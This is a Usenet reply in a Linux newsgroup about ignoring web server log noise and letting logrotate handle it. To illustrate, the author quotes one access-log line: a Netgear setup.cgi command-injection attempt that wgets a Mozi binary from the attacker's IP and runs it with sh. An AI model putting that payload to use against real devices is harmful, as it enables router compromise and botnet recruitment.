Path: csiph.com!news.mixmin.net!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail From: Andreas Kohlbach Newsgroups: comp.os.linux.misc Subject: Re: Is It Time To Replace SSH ??? Date: Sun, 18 Dec 2022 18:47:25 -0500 Organization: A noiseless patient Spider Lines: 25 Message-ID: <87sfhcs29e.fsf@usenet.ankman.de> References: <87r0x0xmre.fsf@usenet.ankman.de> <87mt7mwyvl.fsf@usenet.ankman.de> <871qoywh67.fsf@usenet.ankman.de> <875ye9v7ho.fsf@usenet.ankman.de> MIME-Version: 1.0 Content-Type: text/plain Injection-Info: reader01.eternal-september.org; posting-host="a1e7a317860066575396afa2fe8c7959"; logging-data="88247"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/8/X+9dy5CB5lDNy8Cf6p+" User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux) Cancel-Lock: sha1:LISSFbgB9lHHrBLXshPmBzv3U6w= sha1:rYrWFv508pvSoxuX9ngCWDhfQkE= X-No-Archive: Yes Xref: csiph.com comp.os.linux.misc:36544 On Sun, 18 Dec 2022 23:35:23 +0100, Carlos E. R. wrote: > > On 18/12/2022 02.13, Andreas Kohlbach wrote: >> >> I was referring to "can fill the filesystem". > > Yes, rotating logs takes care of that. But the issue of too much noise > remains. The typical Linux user of today can ignore the noise. Ignore your logs, unless you feel something is not right. Same with (my) web server. Again, I do not offer a commercial service. Thus I not often look into the logs and let logrotate taking care of compressing and later get rid of logs. Ever so often I check for "200 " to see who had success, and shuckle about things like 190.180.154.158 - - [18/Dec/2022:12:02:10 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://190.180.154.158:38147/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 341 "-" "-" in the log. Yes, I could block 190.180.154.158 or a netblock around it. But why? It's just noise I choose to ignore. -- Andreas